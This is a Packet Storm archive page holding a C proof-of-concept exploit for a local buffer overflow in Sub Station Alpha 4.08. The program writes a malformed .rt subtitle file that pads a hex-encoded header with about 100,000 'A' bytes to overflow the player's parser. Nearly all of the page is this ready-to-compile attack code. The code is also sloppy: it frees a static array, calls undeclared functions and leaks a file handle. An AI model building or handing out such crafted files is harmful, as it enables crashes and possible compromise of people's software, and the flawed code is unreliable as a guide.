ignore security and it'll go away

Sub Station Alpha 4.08 Buffer Overflow

Sub Station Alpha 4.08 Buffer Overflow
Posted Jan 15, 2010
Authored by fl0 fl0w

Sub Station Alpha version 4.08 .rt file local buffer overflow proof of concept exploit.

tags | exploit, overflow, local, proof of concept
MD5 | d15c93ce4b99bb84a41e6b4183747c43

Sub Station Alpha 4.08 Buffer Overflow

Change Mirror Download
/*Sub Station Alpha v4.08 .rt file local buffer overflow poc
by fl0 fl0w*/
#include <string.h>
#include <stdio.h>

#define FIL3 "testfile.rt"
char header[]=
{
"\x3C\x77\x69\x6E\x64\x6F\x77\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x32\x35\x30\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x33\x30"
"\x30\x22\x20\x64\x75\x72\x61\x74\x69\x6F\x6E\x3D\x22\x31\x35\x22\x20\x62\x67\x63\x6F\x6C\x6F\x72\x3D\x22\x79\x65\x6C\x6C"
"\x6F\x77\x22\x3E\x0D\x0A\x4D\x61\x72\x79\x20\x68\x61\x64\x20\x61\x20\x6C\x69\x74\x74\x6C\x65\x20\x6C\x61\x6D\x62\x2C\x0D"
"\x0A\x3C\x62\x72\x2F\x3E\x3C\x74\x69\x6D\x65\x20\x62\x65\x67\x69\x6E\x3D\x22" //header 109 bytes
};
char tail[]=
{
//junk
"\x22\x2F\x3E\x0D\x0A\x3C\x62\x72\x2F\x3E\x3C\x74\x69\x6D\x65\x20\x62\x65\x67\x69\x6E\x3D\x22\x36\x22\x2F\x3E\x6C\x69\x74"
"\x74\x6C\x65\x20\x6C\x61\x6D\x62\x2C\x0D\x0A\x3C\x62\x72\x2F\x3E\x3C\x74\x69\x6D\x65\x20\x62\x65\x67\x69\x6E\x3D\x22\x39"
"\x22\x2F\x3E\x4D\x61\x72\x79\x20\x68\x61\x64\x20\x61\x20\x6C\x69\x74\x74\x6C\x65\x20\x6C\x61\x6D\x62\x0D\x0A\x3C\x62\x72"
"\x2F\x3E\x3C\x74\x69\x6D\x65\x20\x62\x65\x67\x69\x6E\x3D\x22\x31\x32\x22\x2F\x3E\x77\x68\x6F\x73\x65\x20\x66\x6C\x65\x65"
"\x63\x65\x20\x77\x61\x73\x20\x77\x68\x69\x74\x65\x20\x61\x73\x20\x73\x6E\x6F\x77\x2E\x0D\x0A\x3C\x2F\x77\x69\x6E\x64\x6F"
"\x77\x3E\x0D\x0A" //tail 154 bytes
};
char banner[]=
{
"***********************************************************\n"
"Sub Station Alpha v4.08 .rt file local buffer overflow poc*\n"
" by fl0 fl0w *\n"
"***********************************************************\n"
};
/*--------prototypes------*/
int cpy(char*,char*,int);
int cpystr(char*,int,int,int);
void print(char*);
unsigned int getFsize(FILE*,char*);
/*-----extern var--------*/
char b[1000000];
char *size;
char junk[1000000];
/*--------main---------------*/
int main()
{
printf("%s",banner);
print("Starting sploit");
memset(junk,0x41,99999);
buildf(FIL3);
print("File done!");
getchar();
return 0;
}
int buildf(char* fname)
{
FILE* fp=fopen(fname,"wb");

if(fp==NULL)
{
print("File writing error");
exit(0);
}
fprintf(fp,"%s%s%s",header,junk,tail);
printf("[!]File is %d bytes",getFsize(fp,FIL3));
fclose(fp);
free(b);

return 0;
}
unsigned int getFsize(FILE* g,char* gname)
{
unsigned int s;

g=fopen(gname,"rb");

if(g==NULL)
{
print("File error at reading");
exit(0);
}
fseek(g,0,SEEK_END);
s=ftell(g);

return s;
}
int cpy(char* source,char* dest,int offset)
{
int len;
len=strlen(source);
memcpy(dest+offset,source,len+1);

return len;
}
int cpystr(char* dest,int str,int len,int offset)
{
memset(dest+offset,str,len+1);
return len;
}
void print(char* msg)
{
printf("\n[*]%s\n",msg);
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    6 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close